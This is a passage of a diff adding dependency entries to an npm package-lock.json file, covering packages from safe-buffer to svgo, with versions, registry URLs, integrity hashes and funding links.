"https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", + "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/string-template": { + "version": "0.2.1", + "resolved": "https://registry.npmjs.org/string-template/-/string-template-0.2.1.tgz", + "integrity": "sha512-Yptehjogou2xm4UJbxJ4CxgZx12HBfeystp0y3x7s4Dj32ltVVG1Gg8YhKjHZkHicuKpZX/ffilA8505VbUbpw==" + }, + "node_modules/string-width": { + "version": "4.2.3", + "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", + "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", + "dependencies": { + "emoji-regex": "^8.0.0", + "is-fullwidth-code-point": "^3.0.0", + "strip-ansi": "^6.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/string-width-cjs": { + "name": "string-width", + "version": "4.2.3", + "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", + "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", + "dev": true, + "dependencies": { + "emoji-regex": "^8.0.0", + "is-fullwidth-code-point": "^3.0.0", + "strip-ansi": "^6.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/string.prototype.matchall": { + "version": "4.0.8", + "resolved": "https://registry.npmjs.org/string.prototype.matchall/-/string.prototype.matchall-4.0.8.tgz", + "integrity": "sha512-6zOCOcJ+RJAQshcTvXPHoxoQGONa3e/Lqx90wUA+wEzX78sg5Bo+1tQo4N0pohS0erG9qtCqJDjNCQBjeWVxyg==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.1.4", + "es-abstract": "^1.20.4", + "get-intrinsic": "^1.1.3", + "has-symbols": "^1.0.3", + "internal-slot": "^1.0.3", + "regexp.prototype.flags": "^1.4.3", + "side-channel": "^1.0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/string.prototype.trim": { + "version": "1.2.9", + "resolved": "https://registry.npmjs.org/string.prototype.trim/-/string.prototype.trim-1.2.9.tgz", + "integrity": "sha512-klHuCNxiMZ8MlsOihJhJEBJAiMVqU3Z2nEXWfWnIqjN0gEFS9J9+IxKozWWtQGcgoa1WUZzLjKPTr4ZHNFTFxw==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7", + "define-properties": "^1.2.1", + "es-abstract": "^1.23.0", + "es-object-atoms": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/string.prototype.trimend": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/string.prototype.trimend/-/string.prototype.trimend-1.0.8.tgz", + "integrity": "sha512-p73uL5VCHCO2BZZ6krwwQE3kCzM7NKmis8S//xEC6fQonchbum4eP6kR4DLEjQFO3Wnj3Fuo8NM0kOSjVdHjZQ==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7", + "define-properties": "^1.2.1", + "es-object-atoms": "^1.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/string.prototype.trimstart": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/string.prototype.trimstart/-/string.prototype.trimstart-1.0.8.tgz", + "integrity": "sha512-UXSH262CSZY1tfu3G3Secr6uGLCFVPMhIqHjlgCUtCCcgihYc/xKs9djMTMUOb2j1mVSeU8EU6NWc/iQKU6Gfg==", + "license": "MIT", + "dependencies": { + 
"call-bind": "^1.0.7", + "define-properties": "^1.2.1", + "es-object-atoms": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/strip-ansi": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", + "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "dependencies": { + "ansi-regex": "^5.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/strip-ansi-cjs": { + "name": "strip-ansi", + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", + "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "dev": true, + "dependencies": { + "ansi-regex": "^5.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/strip-bom": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-3.0.0.tgz", + "integrity": "sha512-vavAMRXOgBVNF6nyEEmL3DBK19iRpDcoIwW+swQ+CbGiu7lju6t+JklA1MHweoWtadgt4ISVUsXLyDq34ddcwA==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/strip-final-newline": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", + "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/strip-indent": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/strip-indent/-/strip-indent-4.0.0.tgz", + "integrity": "sha512-mnVSV2l+Zv6BLpSD/8V87CW/y9EmmbYzGCIavsnsI6/nwn26DwffM/yztm30Z/I2DY9wdS3vXVCMnHDgZaVNoA==", + "dev": true, + "license": "MIT", + "dependencies": { + "min-indent": "^1.0.1" + }, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/strip-json-comments": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", + "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/stripe": { + "version": "17.7.0", + "resolved": "https://registry.npmjs.org/stripe/-/stripe-17.7.0.tgz", + "integrity": "sha512-aT2BU9KkizY9SATf14WhhYVv2uOapBWX0OFWF4xvcj1mPaNotlSc2CsxpS4DS46ZueSppmCF5BX1sNYBtwBvfw==", + "license": "MIT", + "dependencies": { + "@types/node": ">=8.1.0", + "qs": "^6.11.0" + }, + "engines": { + "node": ">=12.*" + } + }, + "node_modules/strnum": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/strnum/-/strnum-1.0.5.tgz", + "integrity": "sha512-J8bbNyKKXl5qYcR36TIO8W3mVGVHrmmxsd5PAItGkmyzwJvybiw2IVq5nqd0i4LSNSkB/sx9VHllbfFdr9k1JA==", + "optional": true, + "peer": true + }, + "node_modules/stubs": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/stubs/-/stubs-3.0.0.tgz", + "integrity": "sha1-6NK6H6nJBXAwPAMLaQD31fiavls=" + }, + "node_modules/style-loader": { + "version": "3.3.3", + "resolved": "https://registry.npmjs.org/style-loader/-/style-loader-3.3.3.tgz", + "integrity": "sha512-53BiGLXAcll9maCYtZi2RCQZKa8NQQai5C4horqKyRmHj9H7QmcUyucrH+4KW/gBQbXM2AsB0axoEcFZPlfPcw==", + "dev": true, + "engines": { + "node": ">= 12.13.0" + }, + "funding": { + "type": "opencollective", + "url": 
"https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^5.0.0" + } + }, + "node_modules/style-mod": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/style-mod/-/style-mod-4.1.0.tgz", + "integrity": "sha512-Ca5ib8HrFn+f+0n4N4ScTIA9iTOQ7MaGS1ylHcoVqW9J7w2w8PzN6g9gKmTYgGEBH8e120+RCmhpje6jC5uGWA==", + "dev": true + }, + "node_modules/stylehacks": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/stylehacks/-/stylehacks-6.0.0.tgz", + "integrity": "sha512-+UT589qhHPwz6mTlCLSt/vMNTJx8dopeJlZAlBMJPWA3ORqu6wmQY7FBXf+qD+FsqoBJODyqNxOUP3jdntFRdw==", + "dev": true, + "dependencies": { + "browserslist": "^4.21.4", + "postcss-selector-parser": "^6.0.4" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/stylelint": { + "version": "16.4.0", + "resolved": "https://registry.npmjs.org/stylelint/-/stylelint-16.4.0.tgz", + "integrity": "sha512-uSx7VMuXwLuYcNSIg+0/fFNv0WinsfLAqsVVy7h7p80clKOHiGE8pfY6UjqwylTHiJrRIahTl6a8FPxGezhWoA==", + "dev": true, + "peer": true, + "dependencies": { + "@csstools/css-parser-algorithms": "^2.6.1", + "@csstools/css-tokenizer": "^2.2.4", + "@csstools/media-query-list-parser": "^2.1.9", + "@csstools/selector-specificity": "^3.0.3", + "@dual-bundle/import-meta-resolve": "^4.0.0", + "balanced-match": "^2.0.0", + "colord": "^2.9.3", + "cosmiconfig": "^9.0.0", + "css-functions-list": "^3.2.2", + "css-tree": "^2.3.1", + "debug": "^4.3.4", + "fast-glob": "^3.3.2", + "fastest-levenshtein": "^1.0.16", + "file-entry-cache": "^8.0.0", + "global-modules": "^2.0.0", + "globby": "^11.1.0", + "globjoin": "^0.1.4", + "html-tags": "^3.3.1", + "ignore": "^5.3.1", + "imurmurhash": "^0.1.4", + "is-plain-object": "^5.0.0", + "known-css-properties": "^0.30.0", + "mathml-tag-names": "^2.1.3", + "meow": "^13.2.0", + "micromatch": "^4.0.5", + "normalize-path": "^3.0.0", + "picocolors": "^1.0.0", + "postcss": "^8.4.38", + "postcss-resolve-nested-selector": "^0.1.1", + "postcss-safe-parser": "^7.0.0", + "postcss-selector-parser": "^6.0.16", + "postcss-value-parser": "^4.2.0", + "resolve-from": "^5.0.0", + "string-width": "^4.2.3", + "strip-ansi": "^7.1.0", + "supports-hyperlinks": "^3.0.0", + "svg-tags": "^1.0.0", + "table": "^6.8.2", + "write-file-atomic": "^5.0.1" + }, + "bin": { + "stylelint": "bin/stylelint.mjs" + }, + "engines": { + "node": ">=18.12.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/stylelint" + } + }, + "node_modules/stylelint-config-recommended": { + "version": "14.0.0", + "resolved": "https://registry.npmjs.org/stylelint-config-recommended/-/stylelint-config-recommended-14.0.0.tgz", + "integrity": "sha512-jSkx290CglS8StmrLp2TxAppIajzIBZKYm3IxT89Kg6fGlxbPiTiyH9PS5YUuVAFwaJLl1ikiXX0QWjI0jmgZQ==", + "dev": true, + "engines": { + "node": ">=18.12.0" + }, + "peerDependencies": { + "stylelint": "^16.0.0" + } + }, + "node_modules/stylelint-config-recommended-scss": { + "version": "14.0.0", + "resolved": "https://registry.npmjs.org/stylelint-config-recommended-scss/-/stylelint-config-recommended-scss-14.0.0.tgz", + "integrity": "sha512-HDvpoOAQ1RpF+sPbDOT2Q2/YrBDEJDnUymmVmZ7mMCeNiFSdhRdyGEimBkz06wsN+HaFwUh249gDR+I9JR7Onw==", + "dev": true, + "dependencies": { + "postcss-scss": "^4.0.9", + "stylelint-config-recommended": "^14.0.0", + "stylelint-scss": "^6.0.0" + }, + "engines": { + "node": ">=18.12.0" + }, + "peerDependencies": { + "postcss": "^8.3.3", + "stylelint": "^16.0.2" + }, + "peerDependenciesMeta": { + 
"postcss": { + "optional": true + } + } + }, + "node_modules/stylelint-config-standard": { + "version": "36.0.0", + "resolved": "https://registry.npmjs.org/stylelint-config-standard/-/stylelint-config-standard-36.0.0.tgz", + "integrity": "sha512-3Kjyq4d62bYFp/Aq8PMKDwlgUyPU4nacXsjDLWJdNPRUgpuxALu1KnlAHIj36cdtxViVhXexZij65yM0uNIHug==", + "dev": true, + "dependencies": { + "stylelint-config-recommended": "^14.0.0" + }, + "engines": { + "node": ">=18.12.0" + }, + "peerDependencies": { + "stylelint": "^16.1.0" + } + }, + "node_modules/stylelint-config-standard-scss": { + "version": "13.1.0", + "resolved": "https://registry.npmjs.org/stylelint-config-standard-scss/-/stylelint-config-standard-scss-13.1.0.tgz", + "integrity": "sha512-Eo5w7/XvwGHWkeGLtdm2FZLOMYoZl1omP2/jgFCXyl2x5yNz7/8vv4Tj6slHvMSSUNTaGoam/GAZ0ZhukvalfA==", + "dev": true, + "dependencies": { + "stylelint-config-recommended-scss": "^14.0.0", + "stylelint-config-standard": "^36.0.0" + }, + "engines": { + "node": ">=18.12.0" + }, + "peerDependencies": { + "postcss": "^8.3.3", + "stylelint": "^16.3.1" + }, + "peerDependenciesMeta": { + "postcss": { + "optional": true + } + } + }, + "node_modules/stylelint-scss": { + "version": "6.2.1", + "resolved": "https://registry.npmjs.org/stylelint-scss/-/stylelint-scss-6.2.1.tgz", + "integrity": "sha512-ZoGLbVb1keZYRVGQlhB8G6sZOoNqw61whzzzGFWp05N12ErqLFfBv3JPrXiMLZaW98sBS7K/vUQhRnvUj4vwdw==", + "dev": true, + "dependencies": { + "known-css-properties": "^0.29.0", + "postcss-media-query-parser": "^0.2.3", + "postcss-resolve-nested-selector": "^0.1.1", + "postcss-selector-parser": "^6.0.15", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": ">=18.12.0" + }, + "peerDependencies": { + "stylelint": "^16.0.2" + } + }, + "node_modules/stylelint-scss/node_modules/known-css-properties": { + "version": "0.29.0", + "resolved": "https://registry.npmjs.org/known-css-properties/-/known-css-properties-0.29.0.tgz", + "integrity": "sha512-Ne7wqW7/9Cz54PDt4I3tcV+hAyat8ypyOGzYRJQfdxnnjeWsTxt1cy8pjvvKeI5kfXuyvULyeeAvwvvtAX3ayQ==", + "dev": true + }, + "node_modules/stylelint/node_modules/@csstools/selector-specificity": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/@csstools/selector-specificity/-/selector-specificity-3.0.3.tgz", + "integrity": "sha512-KEPNw4+WW5AVEIyzC80rTbWEUatTW2lXpN8+8ILC8PiPeWPjwUzrPZDIOZ2wwqDmeqOYTdSGyL3+vE5GC3FB3Q==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "peer": true, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss-selector-parser": "^6.0.13" + } + }, + "node_modules/stylelint/node_modules/ansi-regex": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.0.1.tgz", + "integrity": "sha512-n5M855fKb2SsfMIiFFoVrABHJC8QtHwVx+mHWP3QcEqBHYienj5dHSgjbxtC0WEZXYt4wcD6zrQElDPhFuZgfA==", + "dev": true, + "peer": true, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/chalk/ansi-regex?sponsor=1" + } + }, + "node_modules/stylelint/node_modules/array-union": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/array-union/-/array-union-2.1.0.tgz", + "integrity": "sha512-HGyxoOTYUyCM6stUe6EJgnd4EoewAI7zMdfqO+kGjnlZmBDz/cR5pf8r/cR4Wq60sL/p0IkcjUEEPwS3GFrIyw==", + "dev": true, + "peer": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/stylelint/node_modules/balanced-match": { + 
"version": "2.0.0", + "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-2.0.0.tgz", + "integrity": "sha512-1ugUSr8BHXRnK23KfuYS+gVMC3LB8QGH9W1iGtDPsNWoQbgtXSExkBu2aDR4epiGWZOjZsj6lDl/N/AqqTC3UA==", + "dev": true, + "peer": true + }, + "node_modules/stylelint/node_modules/cosmiconfig": { + "version": "9.0.0", + "resolved": "https://registry.npmjs.org/cosmiconfig/-/cosmiconfig-9.0.0.tgz", + "integrity": "sha512-itvL5h8RETACmOTFc4UfIyB2RfEHi71Ax6E/PivVxq9NseKbOWpeyHEOIbmAw1rs8Ak0VursQNww7lf7YtUwzg==", + "dev": true, + "peer": true, + "dependencies": { + "env-paths": "^2.2.1", + "import-fresh": "^3.3.0", + "js-yaml": "^4.1.0", + "parse-json": "^5.2.0" + }, + "engines": { + "node": ">=14" + }, + "funding": { + "url": "https://github.com/sponsors/d-fischer" + }, + "peerDependencies": { + "typescript": ">=4.9.5" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/stylelint/node_modules/debug": { + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", + "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dev": true, + "peer": true, + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/stylelint/node_modules/file-entry-cache": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/file-entry-cache/-/file-entry-cache-8.0.0.tgz", + "integrity": "sha512-XXTUwCvisa5oacNGRP9SfNtYBNAMi+RPwBFmblZEF7N7swHYQS6/Zfk7SRwx4D5j3CH211YNRco1DEMNVfZCnQ==", + "dev": true, + "peer": true, + "dependencies": { + "flat-cache": "^4.0.0" + }, + "engines": { + "node": ">=16.0.0" + } + }, + "node_modules/stylelint/node_modules/flat-cache": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/flat-cache/-/flat-cache-4.0.1.tgz", + "integrity": "sha512-f7ccFPK3SXFHpx15UIGyRJ/FJQctuKZ0zVuN3frBo4HnK3cay9VEW0R6yPYFHC0AgqhukPzKjq22t5DmAyqGyw==", + "dev": true, + "peer": true, + "dependencies": { + "flatted": "^3.2.9", + "keyv": "^4.5.4" + }, + "engines": { + "node": ">=16" + } + }, + "node_modules/stylelint/node_modules/globby": { + "version": "11.1.0", + "resolved": "https://registry.npmjs.org/globby/-/globby-11.1.0.tgz", + "integrity": "sha512-jhIXaOzy1sb8IyocaruWSn1TjmnBVs8Ayhcy83rmxNJ8q2uWKCAj3CnJY+KpGSXCueAPc0i05kVvVKtP1t9S3g==", + "dev": true, + "peer": true, + "dependencies": { + "array-union": "^2.1.0", + "dir-glob": "^3.0.1", + "fast-glob": "^3.2.9", + "ignore": "^5.2.0", + "merge2": "^1.4.1", + "slash": "^3.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/stylelint/node_modules/is-plain-object": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/is-plain-object/-/is-plain-object-5.0.0.tgz", + "integrity": "sha512-VRSzKkbMm5jMDoKLbltAkFQ5Qr7VDiTFGXxYFXXowVj387GeGNOCsOH6Msy00SGZ3Fp84b1Naa1psqgcCIEP5Q==", + "dev": true, + "peer": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/stylelint/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true, + "peer": true + }, + "node_modules/stylelint/node_modules/slash": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", + "integrity": 
"sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", + "dev": true, + "peer": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/stylelint/node_modules/strip-ansi": { + "version": "7.1.0", + "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.1.0.tgz", + "integrity": "sha512-iq6eVVI64nQQTRYq2KtEg2d2uU7LElhTJwsH4YzIHZshxlgZms/wIc4VoDQTlG/IvVIrBKG06CrZnp0qv7hkcQ==", + "dev": true, + "peer": true, + "dependencies": { + "ansi-regex": "^6.0.1" + }, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/chalk/strip-ansi?sponsor=1" + } + }, + "node_modules/superagent": { + "version": "3.8.3", + "resolved": "https://registry.npmjs.org/superagent/-/superagent-3.8.3.tgz", + "integrity": "sha512-GLQtLMCoEIK4eDv6OGtkOoSMt3D+oq0y3dsxMuYuDvaNUvuT8eFBuLmfR0iYYzHC1e8hpzC6ZsxbuP6DIalMFA==", + "deprecated": "Please upgrade to v7.0.2+ of superagent. We have fixed numerous issues with streams, form-data, attach(), filesystem errors not bubbling up (ENOENT on attach()), and all tests are now passing. See the releases tab for more information at . Thanks to @shadowgate15, @spence-s, and @niftylettuce. Superagent is sponsored by Forward Email at .", + "dependencies": { + "component-emitter": "^1.2.0", + "cookiejar": "^2.1.0", + "debug": "^3.1.0", + "extend": "^3.0.0", + "form-data": "^2.3.1", + "formidable": "^1.2.0", + "methods": "^1.1.1", + "mime": "^1.4.1", + "qs": "^6.5.1", + "readable-stream": "^2.3.5" + }, + "engines": { + "node": ">= 4.0" + } + }, + "node_modules/superagent/node_modules/debug": { + "version": "3.2.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.2.7.tgz", + "integrity": "sha512-CFjzYYAi4ThfiQvizrFQevTTXHtnCqWfe7x1AhgEscTz6ZbLbfoLRLPugTQyBth6f8ZERVUSyWHFD/7Wu4t1XQ==", + "dependencies": { + "ms": "^2.1.1" + } + }, + "node_modules/superagent/node_modules/form-data": { + "version": "2.5.1", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.5.1.tgz", + "integrity": "sha512-m21N3WOmEEURgk6B9GLOE4RuWOFf28Lhh9qGYeNlGq4VDXUlJy2th2slBNU8Gp8EzloYZOibZJ7t5ecIrFSjVA==", + "dependencies": { + "asynckit": "^0.4.0", + "combined-stream": "^1.0.6", + "mime-types": "^2.1.12" + }, + "engines": { + "node": ">= 0.12" + } + }, + "node_modules/superagent/node_modules/isarray": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", + "integrity": "sha1-u5NdSFgsuhaMBoNJV6VKPgcSTxE=" + }, + "node_modules/superagent/node_modules/mime": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/mime/-/mime-1.6.0.tgz", + "integrity": "sha512-x0Vn8spI+wuJ1O6S7gnbaQg8Pxh4NNHb7KSINmEWKiPE4RKOplvijn+NkmYmmRgP68mc70j2EbeTFRsrswaQeg==", + "bin": { + "mime": "cli.js" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/superagent/node_modules/readable-stream": { + "version": "2.3.7", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.7.tgz", + "integrity": "sha512-Ebho8K4jIbHAxnuxi7o42OrZgF/ZTNcsZj6nRKyUmkhLFq8CHItp/fy6hQZuZmP/n3yZ9VBUbp4zz/mX8hmYPw==", + "dependencies": { + "core-util-is": "~1.0.0", + "inherits": "~2.0.3", + "isarray": "~1.0.0", + "process-nextick-args": "~2.0.0", + "safe-buffer": "~5.1.1", + "string_decoder": "~1.1.1", + "util-deprecate": "~1.0.1" + } + }, + "node_modules/superagent/node_modules/string_decoder": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "integrity": 
"sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", + "dependencies": { + "safe-buffer": "~5.1.0" + } + }, + "node_modules/supports-color": { + "version": "8.1.1", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", + "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/supports-color?sponsor=1" + } + }, + "node_modules/supports-hyperlinks": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/supports-hyperlinks/-/supports-hyperlinks-3.0.0.tgz", + "integrity": "sha512-QBDPHyPQDRTy9ku4URNGY5Lah8PAaXs6tAAwp55sL5WCsSW7GIfdf6W5ixfziW+t7wh3GVvHyHHyQ1ESsoRvaA==", + "dev": true, + "peer": true, + "dependencies": { + "has-flag": "^4.0.0", + "supports-color": "^7.0.0" + }, + "engines": { + "node": ">=14.18" + } + }, + "node_modules/supports-hyperlinks/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "peer": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/supports-preserve-symlinks-flag": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", + "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/svg-tags": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/svg-tags/-/svg-tags-1.0.0.tgz", + "integrity": "sha512-ovssysQTa+luh7A5Weu3Rta6FJlFBBbInjOh722LIt6klpU2/HtdUbszju/G4devcvk8PGt7FCLv5wftu3THUA==", + "dev": true, + "peer": true + }, + "node_modules/svgo": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/svgo/-/svgo-3.0.4.tgz", + "integrity": "sha512-T+Xul3JwuJ6VGXKo/p2ndqx1ibxNKnLTvRc1ZTWKCfyKS/GgNjRZcYsK84fxTsy/izr91g/Rwx6fGnVgaFSI5g==", + "dev": true, + "dependencies": { + "@trysound/sax": "0.2.0", + "commander": "^7.2.0", + "css-select": "^5.1.0", + "css-tree": "^2.2.1", + "css-what": "^6.1.0", + "csso": "5.0.5", + "picocolors": "^1.0.0" + }, + "bin": { + "svgo": "bin/svgo" + }, + "engines": { + "node": ">=14.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/svgo" + } + }, + "node_modules/svgo/node_modules/commander": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/commander/-/commander-7.2.0.tgz", + "integrity": "sha512-QrWXB+ZQSVPmIWIhtEO9H+gwHaMGYiF5ChvoJ+K9ZGHG/sVsa6yiesAD1GC/x46sET00Xlwo1u49RVVVzvcSkw==", + "dev": true, + "engines": { + "node": ">= 10" + } + }, + "node_modules/svgo/node_modules/css-select": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/css-select/-/css-select-5.1.0.tgz", + "integrity": "sha512-nwoRF1rvRRnnCqqY7updORDsuqKzqYJ28+oSMaJMMgOauh3fvwHqMS7EZpIPqK8GL+g9mKxF1vP/ZjSeNjEVHg==", + "dev": true, + "dependencies": { + "boolbase": "^1.0.0", + "css-what": "^6.1.0", + "domhandler": "^5.0.2", + "domutils": "^3.0.1", + "nth-check": "^2.0.1" + }, + "funding": { + "url": "https://github.com/sponsors/fb55" + } + }, + 
"node_modules/svgo/node_modules/css-what": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/css-what/-/css-what-6.1.0.tgz", + "integrity": "sha512-HTUrgRJ7r4dsZKU6GjmpfRK1O76h97Z8MfS1G0FozR+oF2kG6Vfe8JE6zwrkbxigziPHinCJ+gCPjA9EaBDtRw==", + "dev": true, + "engines": { + "node": ">= 6" + }, + "funding": { + "url": "https://github.com/sponsors/fb55" + } + }, + "node_modules/svgo/node_modules/dom-serializer": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/dom-serializer/-/dom-serializer-2.0.0.tgz", + "integrity": "sha512-wIkAryiqt/nV5EQKqQpo3SToSOV9J0DnbJqwK7Wv/Trc92zIAYZ4FlMu+JPFW1DfGFt81ZTCGgDEabffXeLyJg==", + "dev": true, + "dependencies": { + "domelementtype": "^2.3.0", + "domhandler": "^5.0.2", + "entities": "^4.2.0" + }, + "funding": { + "url": "https://github.com/cheeriojs/dom-serializer?sponsor=1" + } + }, + "node_modules/svgo/node_modules/domhandler": { + "version": "5.0.3", + "resolved": "https://registry.npmjs.org/domhandler/-/domhandler-5.0.3.tgz", + "integrity": 